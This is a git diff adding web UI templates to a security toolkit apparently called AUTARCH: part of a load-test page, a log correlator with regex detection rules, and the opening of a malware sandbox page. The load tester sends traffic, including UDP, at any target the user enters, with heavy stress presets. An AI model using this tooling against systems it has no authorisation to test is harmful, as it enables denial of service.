config.target = _v('lt-udp-target');
|
||||
config.payload_size = parseInt(_v('lt-udp-payload')) || 1024;
|
||||
}
|
||||
|
||||
return config;
|
||||
}
|
||||
|
||||
function startTest() {
|
||||
const config = _buildConfig();
|
||||
if (!config.target) { alert('Enter a target'); return; }
|
||||
|
||||
fetch('/loadtest/start', {
|
||||
method: 'POST', headers: {'Content-Type': 'application/json'},
|
||||
body: JSON.stringify(config)
|
||||
}).then(r => r.json()).then(d => {
|
||||
if (!d.ok) { alert(d.error || 'Failed to start'); return; }
|
||||
_showRunning();
|
||||
_startStream();
|
||||
}).catch(e => alert('Error: ' + e.message));
|
||||
}
|
||||
|
||||
function stopTest() {
|
||||
fetch('/loadtest/stop', {method: 'POST'}).then(() => {
|
||||
_showStopped();
|
||||
_stopStream();
|
||||
});
|
||||
}
|
||||
|
||||
function pauseTest() {
|
||||
fetch('/loadtest/pause', {method: 'POST'}).then(() => {
|
||||
document.getElementById('btn-pause').style.display = 'none';
|
||||
document.getElementById('btn-resume').style.display = '';
|
||||
});
|
||||
}
|
||||
|
||||
function resumeTest() {
|
||||
fetch('/loadtest/resume', {method: 'POST'}).then(() => {
|
||||
document.getElementById('btn-resume').style.display = 'none';
|
||||
document.getElementById('btn-pause').style.display = '';
|
||||
});
|
||||
}
|
||||
|
||||
function _showRunning() {
|
||||
document.getElementById('btn-start').style.display = 'none';
|
||||
document.getElementById('btn-pause').style.display = '';
|
||||
document.getElementById('btn-stop').style.display = '';
|
||||
document.getElementById('btn-resume').style.display = 'none';
|
||||
document.getElementById('dashboard-section').style.display = '';
|
||||
}
|
||||
|
||||
function _showStopped() {
|
||||
document.getElementById('btn-start').style.display = '';
|
||||
document.getElementById('btn-pause').style.display = 'none';
|
||||
document.getElementById('btn-stop').style.display = 'none';
|
||||
document.getElementById('btn-resume').style.display = 'none';
|
||||
}
|
||||
|
||||
function _startStream() {
|
||||
_stopStream();
|
||||
// Use polling as a reliable fallback (SSE can be flaky through proxies)
|
||||
_ltPollTimer = setInterval(function() {
|
||||
fetch('/loadtest/status').then(r => r.json()).then(d => {
|
||||
if (!d.running) {
|
||||
_showStopped();
|
||||
_stopStream();
|
||||
}
|
||||
if (d.metrics) _updateMetrics(d.metrics);
|
||||
}).catch(() => {});
|
||||
}, 1000);
|
||||
}
|
||||
|
||||
function _stopStream() {
|
||||
if (_ltEventSource) { _ltEventSource.close(); _ltEventSource = null; }
|
||||
if (_ltPollTimer) { clearInterval(_ltPollTimer); _ltPollTimer = null; }
|
||||
}
|
||||
|
||||
function _fmtBytes(b) {
|
||||
if (b < 1024) return b + ' B';
|
||||
if (b < 1048576) return (b / 1024).toFixed(1) + ' KB';
|
||||
if (b < 1073741824) return (b / 1048576).toFixed(1) + ' MB';
|
||||
return (b / 1073741824).toFixed(2) + ' GB';
|
||||
}
|
||||
|
||||
function _updateMetrics(m) {
|
||||
document.getElementById('m-rps').textContent = m.rps.toFixed(1);
|
||||
document.getElementById('m-total').textContent = m.total_requests;
|
||||
document.getElementById('m-success').textContent = m.success_rate.toFixed(1) + '%';
|
||||
document.getElementById('m-avg-latency').textContent = m.avg_latency.toFixed(0) + 'ms';
|
||||
|
||||
document.getElementById('m-workers').textContent = m.active_workers;
|
||||
document.getElementById('m-elapsed').textContent = m.elapsed.toFixed(0) + 's';
|
||||
document.getElementById('m-ok').textContent = m.successful;
|
||||
document.getElementById('m-fail').textContent = m.failed;
|
||||
document.getElementById('m-sent').textContent = _fmtBytes(m.bytes_sent);
|
||||
document.getElementById('m-recv').textContent = _fmtBytes(m.bytes_received);
|
||||
|
||||
document.getElementById('m-p-min').textContent = m.min_latency.toFixed(1) + 'ms';
|
||||
document.getElementById('m-p50').textContent = m.p50_latency.toFixed(1) + 'ms';
|
||||
document.getElementById('m-p95').textContent = m.p95_latency.toFixed(1) + 'ms';
|
||||
document.getElementById('m-p99').textContent = m.p99_latency.toFixed(1) + 'ms';
|
||||
document.getElementById('m-p-max').textContent = m.max_latency.toFixed(1) + 'ms';
|
||||
document.getElementById('m-err-rate').textContent = m.error_rate.toFixed(1) + '%';
|
||||
|
||||
// Status codes
|
||||
const codes = m.status_codes || {};
|
||||
const codeKeys = Object.keys(codes).sort();
|
||||
if (codeKeys.length) {
|
||||
document.getElementById('m-status-codes').innerHTML = codeKeys.map(c => {
|
||||
const color = c < 300 ? 'var(--success)' : c < 400 ? 'var(--warning)' : 'var(--error)';
|
||||
return '<span style="color:' + color + '">' + escapeHtml(c) + '</span>: ' + codes[c];
|
||||
}).join(' ');
|
||||
}
|
||||
|
||||
// Errors
|
||||
const errs = m.top_errors || {};
|
||||
const errKeys = Object.keys(errs);
|
||||
if (errKeys.length) {
|
||||
document.getElementById('m-errors').innerHTML = errKeys.map(e =>
|
||||
'<div>' + errs[e] + '× <span style="color:var(--text-muted)">' + escapeHtml(e) + '</span></div>'
|
||||
).join('');
|
||||
}
|
||||
|
||||
// RPS chart
|
||||
const rpsHist = m.rps_history || [];
|
||||
if (rpsHist.length > 1) {
|
||||
const chart = document.getElementById('rps-chart');
|
||||
const maxRps = Math.max(...rpsHist, 1);
|
||||
chart.innerHTML = rpsHist.map(r => {
|
||||
const h = Math.max(2, (r / maxRps) * 70);
|
||||
return '<div style="flex:1;min-width:2px;background:var(--accent);height:' + h + 'px;border-radius:1px 1px 0 0" title="' + r + ' req/s"></div>';
|
||||
}).join('');
|
||||
}
|
||||
}
|
||||
|
||||
function applyPreset(name) {
|
||||
const presets = {
|
||||
'gentle': {workers: 5, duration: 10, ramp: 'constant', rampDur: 0},
|
||||
'moderate': {workers: 25, duration: 30, ramp: 'constant', rampDur: 0},
|
||||
'heavy': {workers: 100, duration: 60, ramp: 'constant', rampDur: 0},
|
||||
'stress': {workers: 250, duration: 120, ramp: 'constant', rampDur: 0},
|
||||
'ramp': {workers: 50, duration: 60, ramp: 'linear', rampDur: 30},
|
||||
'spike': {workers: 100, duration: 30, ramp: 'spike', rampDur: 10},
|
||||
};
|
||||
const p = presets[name];
|
||||
if (!p) return;
|
||||
document.getElementById('lt-workers').value = p.workers;
|
||||
document.getElementById('lt-duration').value = p.duration;
|
||||
document.getElementById('lt-ramp').value = p.ramp;
|
||||
document.getElementById('lt-ramp-dur').value = p.rampDur;
|
||||
}
|
||||
|
||||
// On load: check if test is already running
|
||||
document.addEventListener('DOMContentLoaded', function() {
|
||||
fetch('/loadtest/status').then(r => r.json()).then(d => {
|
||||
if (d.running) {
|
||||
_showRunning();
|
||||
_startStream();
|
||||
if (d.metrics) _updateMetrics(d.metrics);
|
||||
}
|
||||
}).catch(() => {});
|
||||
});
|
||||
</script>
|
||||
{% endblock %}
|
||||
473
web/templates/log_correlator.html
Normal file
473
web/templates/log_correlator.html
Normal file
@ -0,0 +1,473 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — Log Correlator{% endblock %}
|
||||
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Log Correlator</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
Ingest, correlate, and alert on security events from multiple log sources.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="logs" data-tab="ingest" onclick="showTab('logs','ingest')">Ingest</button>
|
||||
<button class="tab" data-tab-group="logs" data-tab="alerts" onclick="showTab('logs','alerts')">Alerts</button>
|
||||
<button class="tab" data-tab-group="logs" data-tab="rules" onclick="showTab('logs','rules')">Rules</button>
|
||||
<button class="tab" data-tab-group="logs" data-tab="stats" onclick="showTab('logs','stats')">Stats</button>
|
||||
</div>
|
||||
|
||||
<!-- ==================== INGEST TAB ==================== -->
|
||||
<div class="tab-content active" data-tab-group="logs" data-tab="ingest">
|
||||
|
||||
<div class="section">
|
||||
<h2>Ingest from File</h2>
|
||||
<div class="input-row">
|
||||
<input type="text" id="log-ingest-path" placeholder="Log file path (e.g. /var/log/auth.log)">
|
||||
<button id="btn-ingest-file" class="btn btn-primary" onclick="logIngestFile()">Ingest File</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="log-ingest-file-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Paste Log Data</h2>
|
||||
<div class="form-group">
|
||||
<label>Paste raw log entries</label>
|
||||
<textarea id="log-ingest-paste" rows="6" style="width:100%;background:var(--bg-input);border:1px solid var(--border);border-radius:var(--radius);color:var(--text-primary);padding:10px;font-family:monospace;font-size:0.85rem;resize:vertical" placeholder="Paste log lines here..."></textarea>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-ingest-paste" class="btn btn-primary" onclick="logIngestPaste()">Ingest Pasted Data</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="log-ingest-paste-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Sources</h2>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button class="btn btn-small" onclick="logLoadSources()">Refresh</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Source</th><th>Type</th><th>Entries</th><th>Last Ingested</th></tr></thead>
|
||||
<tbody id="log-sources-table">
|
||||
<tr><td colspan="4" class="empty-state">No log sources ingested yet.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Search Logs</h2>
|
||||
<div class="input-row">
|
||||
<input type="text" id="log-search-query" placeholder="Search pattern (regex supported)" onkeydown="if(event.key==='Enter')logSearch()">
|
||||
<button id="btn-log-search" class="btn btn-primary" onclick="logSearch()">Search</button>
|
||||
</div>
|
||||
<span id="log-search-count" style="font-size:0.8rem;color:var(--text-muted)"></span>
|
||||
<table class="data-table" style="margin-top:8px">
|
||||
<thead><tr><th>Timestamp</th><th>Source</th><th>Log Entry</th></tr></thead>
|
||||
<tbody id="log-search-results">
|
||||
<tr><td colspan="3" class="empty-state">Enter a query and click Search.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-danger btn-small" onclick="logClearAll()">Clear All Logs</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== ALERTS TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="logs" data-tab="alerts">
|
||||
|
||||
<div class="section">
|
||||
<h2>Security Alerts</h2>
|
||||
<div style="display:flex;gap:8px;align-items:center;margin-bottom:12px;flex-wrap:wrap">
|
||||
<span style="font-size:0.85rem;color:var(--text-secondary)">Severity:</span>
|
||||
<button class="btn btn-small log-sev-btn active" data-severity="all" onclick="logFilterAlerts('all',this)">All</button>
|
||||
<button class="btn btn-small log-sev-btn" data-severity="critical" onclick="logFilterAlerts('critical',this)" style="border-color:var(--danger);color:var(--danger)">Critical</button>
|
||||
<button class="btn btn-small log-sev-btn" data-severity="high" onclick="logFilterAlerts('high',this)" style="border-color:#f97316;color:#f97316">High</button>
|
||||
<button class="btn btn-small log-sev-btn" data-severity="medium" onclick="logFilterAlerts('medium',this)" style="border-color:var(--warning);color:var(--warning)">Medium</button>
|
||||
<button class="btn btn-small log-sev-btn" data-severity="low" onclick="logFilterAlerts('low',this)" style="border-color:var(--accent);color:var(--accent)">Low</button>
|
||||
<button class="btn btn-small" style="margin-left:auto" onclick="logRefreshAlerts()">Refresh</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Timestamp</th><th>Rule</th><th>Severity</th><th>Source</th><th>Log Entry</th></tr></thead>
|
||||
<tbody id="log-alerts-table">
|
||||
<tr><td colspan="5" class="empty-state">No alerts triggered yet.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
<div class="tool-actions" style="margin-top:12px">
|
||||
<button class="btn btn-danger btn-small" onclick="logClearAlerts()">Clear Alerts</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== RULES TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="logs" data-tab="rules">
|
||||
|
||||
<div class="section">
|
||||
<h2>Detection Rules</h2>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button class="btn btn-small" onclick="logLoadRules()">Refresh</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>ID</th><th>Name</th><th>Pattern</th><th>Severity</th><th>Type</th><th>Action</th></tr></thead>
|
||||
<tbody id="log-rules-table">
|
||||
<tr><td colspan="6" class="empty-state">No rules loaded.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Add Custom Rule</h2>
|
||||
<div class="form-row" style="margin-bottom:8px">
|
||||
<div class="form-group">
|
||||
<label>Rule ID</label>
|
||||
<input type="text" id="log-rule-id" placeholder="e.g. CUSTOM-001">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Name</label>
|
||||
<input type="text" id="log-rule-name" placeholder="e.g. SSH Root Login">
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-row" style="margin-bottom:8px">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Pattern (regex)</label>
|
||||
<input type="text" id="log-rule-pattern" placeholder="e.g. Failed password for root">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Severity</label>
|
||||
<select id="log-rule-severity">
|
||||
<option value="low">Low</option>
|
||||
<option value="medium" selected>Medium</option>
|
||||
<option value="high">High</option>
|
||||
<option value="critical">Critical</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-row" style="margin-bottom:12px">
|
||||
<div class="form-group">
|
||||
<label>Threshold (count)</label>
|
||||
<input type="number" id="log-rule-threshold" value="1" min="1" max="10000">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Window (seconds)</label>
|
||||
<input type="number" id="log-rule-window" value="300" min="1" max="86400">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-add-rule" class="btn btn-primary" onclick="logAddRule()">Add Rule</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="log-rule-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== STATS TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="logs" data-tab="stats">
|
||||
|
||||
<div class="section">
|
||||
<h2>Overview</h2>
|
||||
<div class="stats-grid">
|
||||
<div class="stat-card">
|
||||
<div class="stat-label">Total Logs</div>
|
||||
<div class="stat-value" id="log-stat-total">--</div>
|
||||
</div>
|
||||
<div class="stat-card">
|
||||
<div class="stat-label">Total Alerts</div>
|
||||
<div class="stat-value" id="log-stat-alerts">--</div>
|
||||
</div>
|
||||
<div class="stat-card">
|
||||
<div class="stat-label">Sources</div>
|
||||
<div class="stat-value" id="log-stat-sources">--</div>
|
||||
</div>
|
||||
<div class="stat-card">
|
||||
<div class="stat-label">Active Rules</div>
|
||||
<div class="stat-value" id="log-stat-rules">--</div>
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button class="btn btn-small" onclick="logLoadStats()">Refresh Stats</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Alerts by Severity</h2>
|
||||
<table class="data-table" style="max-width:400px">
|
||||
<tbody id="log-stats-severity">
|
||||
<tr><td>Critical</td><td id="log-sev-critical">--</td></tr>
|
||||
<tr><td>High</td><td id="log-sev-high">--</td></tr>
|
||||
<tr><td>Medium</td><td id="log-sev-medium">--</td></tr>
|
||||
<tr><td>Low</td><td id="log-sev-low">--</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Top Triggered Rules</h2>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Rule</th><th>Count</th><th>Last Triggered</th></tr></thead>
|
||||
<tbody id="log-stats-top-rules">
|
||||
<tr><td colspan="3" class="empty-state">No data yet.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Timeline (Hourly Alert Counts)</h2>
|
||||
<div id="log-stats-timeline" style="background:var(--bg-card);border:1px solid var(--border);border-radius:var(--radius);padding:16px;min-height:120px">
|
||||
<div id="log-timeline-bars" style="display:flex;align-items:flex-end;gap:2px;height:100px"></div>
|
||||
<div id="log-timeline-labels" style="display:flex;gap:2px;font-size:0.65rem;color:var(--text-muted);margin-top:4px"></div>
|
||||
<p id="log-timeline-empty" class="empty-state" style="margin:0;padding:24px 0">No timeline data yet. Ingest logs and trigger rules to populate.</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<script>
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
var _currentSevFilter = 'all';
|
||||
|
||||
/* ── Ingest ── */
|
||||
function logIngestFile() {
|
||||
var path = document.getElementById('log-ingest-path').value.trim();
|
||||
if (!path) return;
|
||||
var btn = document.getElementById('btn-ingest-file');
|
||||
setLoading(btn, true);
|
||||
postJSON('/logs/ingest/file', {path: path}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('log-ingest-file-output', data.message || data.error || 'Done');
|
||||
if (data.success) logLoadSources();
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function logIngestPaste() {
|
||||
var text = document.getElementById('log-ingest-paste').value.trim();
|
||||
if (!text) return;
|
||||
var btn = document.getElementById('btn-ingest-paste');
|
||||
setLoading(btn, true);
|
||||
postJSON('/logs/ingest/paste', {data: text}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('log-ingest-paste-output', data.message || data.error || 'Done');
|
||||
if (data.success) logLoadSources();
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function logLoadSources() {
|
||||
fetchJSON('/logs/sources').then(function(data) {
|
||||
var tb = document.getElementById('log-sources-table');
|
||||
var sources = data.sources || [];
|
||||
if (!sources.length) {
|
||||
tb.innerHTML = '<tr><td colspan="4" class="empty-state">No log sources ingested yet.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
sources.forEach(function(s) {
|
||||
html += '<tr><td>' + esc(s.name) + '</td><td>' + esc(s.type) + '</td>'
|
||||
+ '<td>' + (s.entries || 0) + '</td><td>' + esc(s.last_ingested || '--') + '</td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function logSearch() {
|
||||
var query = document.getElementById('log-search-query').value.trim();
|
||||
if (!query) return;
|
||||
var btn = document.getElementById('btn-log-search');
|
||||
setLoading(btn, true);
|
||||
postJSON('/logs/search', {query: query}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
var results = data.results || [];
|
||||
document.getElementById('log-search-count').textContent = results.length + ' results';
|
||||
var tb = document.getElementById('log-search-results');
|
||||
if (!results.length) {
|
||||
tb.innerHTML = '<tr><td colspan="3" class="empty-state">No matches found.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
results.forEach(function(r) {
|
||||
html += '<tr><td style="white-space:nowrap;font-size:0.8rem">' + esc(r.timestamp || '--') + '</td>'
|
||||
+ '<td>' + esc(r.source || '--') + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem">' + esc(r.entry) + '</td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function logClearAll() {
|
||||
if (!confirm('Clear all ingested logs? This cannot be undone.')) return;
|
||||
postJSON('/logs/clear', {}).then(function(data) {
|
||||
if (data.success) {
|
||||
logLoadSources();
|
||||
document.getElementById('log-search-results').innerHTML = '<tr><td colspan="3" class="empty-state">No matches found.</td></tr>';
|
||||
document.getElementById('log-search-count').textContent = '';
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Alerts ── */
|
||||
function logRefreshAlerts() {
|
||||
logFilterAlerts(_currentSevFilter);
|
||||
}
|
||||
|
||||
function logFilterAlerts(severity, btnEl) {
|
||||
_currentSevFilter = severity;
|
||||
document.querySelectorAll('.log-sev-btn').forEach(function(b) {
|
||||
b.classList.toggle('active', b.dataset.severity === severity);
|
||||
});
|
||||
fetchJSON('/logs/alerts?severity=' + severity).then(function(data) {
|
||||
var tb = document.getElementById('log-alerts-table');
|
||||
var alerts = data.alerts || [];
|
||||
if (!alerts.length) {
|
||||
tb.innerHTML = '<tr><td colspan="5" class="empty-state">No alerts' + (severity !== 'all' ? ' with severity "' + severity + '"' : '') + '.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
alerts.forEach(function(a) {
|
||||
var sev = (a.severity || 'low').toLowerCase();
|
||||
var badgeClass = sev === 'critical' ? 'badge-fail'
|
||||
: sev === 'high' ? 'badge-high'
|
||||
: sev === 'medium' ? 'badge-medium' : 'badge-low';
|
||||
html += '<tr><td style="white-space:nowrap;font-size:0.8rem">' + esc(a.timestamp || '--') + '</td>'
|
||||
+ '<td>' + esc(a.rule || '--') + '</td>'
|
||||
+ '<td><span class="badge ' + badgeClass + '">' + esc(a.severity) + '</span></td>'
|
||||
+ '<td>' + esc(a.source || '--') + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem;max-width:300px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap">' + esc(a.entry || '') + '</td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function logClearAlerts() {
|
||||
if (!confirm('Clear all alerts?')) return;
|
||||
postJSON('/logs/alerts/clear', {}).then(function(data) {
|
||||
if (data.success) logRefreshAlerts();
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Rules ── */
|
||||
function logLoadRules() {
|
||||
fetchJSON('/logs/rules').then(function(data) {
|
||||
var tb = document.getElementById('log-rules-table');
|
||||
var rules = data.rules || [];
|
||||
if (!rules.length) {
|
||||
tb.innerHTML = '<tr><td colspan="6" class="empty-state">No rules loaded.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
rules.forEach(function(r) {
|
||||
var sev = (r.severity || 'low').toLowerCase();
|
||||
var badgeClass = sev === 'critical' ? 'badge-fail'
|
||||
: sev === 'high' ? 'badge-high'
|
||||
: sev === 'medium' ? 'badge-medium' : 'badge-low';
|
||||
var typeBadge = r.builtin ? '<span class="badge badge-info">Built-in</span>' : '<span class="badge badge-medium">Custom</span>';
|
||||
var deleteBtn = r.builtin ? '' : '<button class="btn btn-danger btn-small" onclick="logDeleteRule(\'' + esc(r.id) + '\')">Delete</button>';
|
||||
html += '<tr><td style="font-family:monospace;font-size:0.85rem">' + esc(r.id) + '</td>'
|
||||
+ '<td>' + esc(r.name) + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem">' + esc(r.pattern) + '</td>'
|
||||
+ '<td><span class="badge ' + badgeClass + '">' + esc(r.severity) + '</span></td>'
|
||||
+ '<td>' + typeBadge + '</td>'
|
||||
+ '<td>' + deleteBtn + '</td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function logAddRule() {
|
||||
var rule = {
|
||||
id: document.getElementById('log-rule-id').value.trim(),
|
||||
name: document.getElementById('log-rule-name').value.trim(),
|
||||
pattern: document.getElementById('log-rule-pattern').value.trim(),
|
||||
severity: document.getElementById('log-rule-severity').value,
|
||||
threshold: parseInt(document.getElementById('log-rule-threshold').value) || 1,
|
||||
window: parseInt(document.getElementById('log-rule-window').value) || 300
|
||||
};
|
||||
if (!rule.id || !rule.name || !rule.pattern) {
|
||||
renderOutput('log-rule-output', 'Rule ID, Name, and Pattern are required.');
|
||||
return;
|
||||
}
|
||||
var btn = document.getElementById('btn-add-rule');
|
||||
setLoading(btn, true);
|
||||
postJSON('/logs/rules/add', rule).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('log-rule-output', data.message || data.error || 'Done');
|
||||
if (data.success) {
|
||||
logLoadRules();
|
||||
document.getElementById('log-rule-id').value = '';
|
||||
document.getElementById('log-rule-name').value = '';
|
||||
document.getElementById('log-rule-pattern').value = '';
|
||||
}
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function logDeleteRule(id) {
|
||||
if (!confirm('Delete rule "' + id + '"?')) return;
|
||||
postJSON('/logs/rules/delete', {id: id}).then(function(data) {
|
||||
if (data.success) logLoadRules();
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Stats ── */
|
||||
function logLoadStats() {
|
||||
fetchJSON('/logs/stats').then(function(data) {
|
||||
document.getElementById('log-stat-total').textContent = data.total_logs || 0;
|
||||
document.getElementById('log-stat-alerts').textContent = data.total_alerts || 0;
|
||||
document.getElementById('log-stat-sources').textContent = data.total_sources || 0;
|
||||
document.getElementById('log-stat-rules').textContent = data.total_rules || 0;
|
||||
|
||||
var bySev = data.alerts_by_severity || {};
|
||||
document.getElementById('log-sev-critical').textContent = bySev.critical || 0;
|
||||
document.getElementById('log-sev-high').textContent = bySev.high || 0;
|
||||
document.getElementById('log-sev-medium').textContent = bySev.medium || 0;
|
||||
document.getElementById('log-sev-low').textContent = bySev.low || 0;
|
||||
|
||||
var topRules = data.top_rules || [];
|
||||
var trTb = document.getElementById('log-stats-top-rules');
|
||||
if (!topRules.length) {
|
||||
trTb.innerHTML = '<tr><td colspan="3" class="empty-state">No data yet.</td></tr>';
|
||||
} else {
|
||||
var html = '';
|
||||
topRules.forEach(function(r) {
|
||||
html += '<tr><td>' + esc(r.name) + '</td><td>' + r.count + '</td><td>' + esc(r.last_triggered || '--') + '</td></tr>';
|
||||
});
|
||||
trTb.innerHTML = html;
|
||||
}
|
||||
|
||||
/* Timeline bars */
|
||||
var timeline = data.timeline || [];
|
||||
var emptyMsg = document.getElementById('log-timeline-empty');
|
||||
var barsEl = document.getElementById('log-timeline-bars');
|
||||
var labelsEl = document.getElementById('log-timeline-labels');
|
||||
if (!timeline.length) {
|
||||
emptyMsg.style.display = 'block';
|
||||
barsEl.innerHTML = '';
|
||||
labelsEl.innerHTML = '';
|
||||
} else {
|
||||
emptyMsg.style.display = 'none';
|
||||
var maxVal = Math.max.apply(null, timeline.map(function(t) { return t.count; })) || 1;
|
||||
var barsHtml = '';
|
||||
var labelsHtml = '';
|
||||
timeline.forEach(function(t) {
|
||||
var pct = Math.max(2, Math.round((t.count / maxVal) * 100));
|
||||
var color = t.count > maxVal * 0.7 ? 'var(--danger)' : t.count > maxVal * 0.4 ? 'var(--warning)' : 'var(--accent)';
|
||||
barsHtml += '<div style="flex:1;height:' + pct + '%;background:' + color + ';border-radius:2px 2px 0 0;min-width:4px" title="' + esc(t.hour) + ': ' + t.count + ' alerts"></div>';
|
||||
labelsHtml += '<div style="flex:1;text-align:center;min-width:4px">' + esc(t.hour || '') + '</div>';
|
||||
});
|
||||
barsEl.innerHTML = barsHtml;
|
||||
labelsEl.innerHTML = labelsHtml;
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Init ── */
|
||||
document.addEventListener('DOMContentLoaded', function() {
|
||||
logLoadSources();
|
||||
logLoadRules();
|
||||
logRefreshAlerts();
|
||||
logLoadStats();
|
||||
});
|
||||
</script>
|
||||
{% endblock %}
|
||||
408
web/templates/malware_sandbox.html
Normal file
408
web/templates/malware_sandbox.html
Normal file
@ -0,0 +1,408 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — Malware Sandbox{% endblock %}
|
||||
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Malware Sandbox</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
Submit, analyze, and report on suspicious files using static and dynamic analysis.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="sandbox" data-tab="submit" onclick="showTab('sandbox','submit')">Submit</button>
|
||||
<button class="tab" data-tab-group="sandbox" data-tab="analyze" onclick="showTab('sandbox','analyze')">Analyze</button>
|
||||
<button class="tab" data-tab-group="sandbox" data-tab="reports" onclick="showTab('sandbox','reports')">Reports</button>
|
||||
</div>
|
||||
|
||||
<!-- ==================== SUBMIT TAB ==================== -->
|
||||
<div class="tab-content active" data-tab-group="sandbox" data-tab="submit">
|
||||
|
||||
<div class="section">
|
||||
<h2>Submit Sample</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Upload a file or specify a path on the server to submit for analysis.
|
||||
</p>
|
||||
|
||||
<div class="form-row" style="margin-bottom:12px">
|
||||
<div class="form-group">
|
||||
<label>Upload File</label>
|
||||
<input type="file" id="sandbox-upload-file">
|
||||
</div>
|
||||
</div>
|
||||
<div style="font-size:0.8rem;color:var(--text-muted);text-align:center;margin-bottom:12px">-- OR --</div>
|
||||
<div class="form-row" style="margin-bottom:12px">
|
||||
<div class="form-group">
|
||||
<label>Server File Path</label>
|
||||
<input type="text" id="sandbox-file-path" placeholder="/path/to/suspicious/file">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-sandbox-submit" class="btn btn-primary" onclick="sandboxSubmit()">Submit Sample</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="sandbox-submit-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Submitted Samples</h2>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
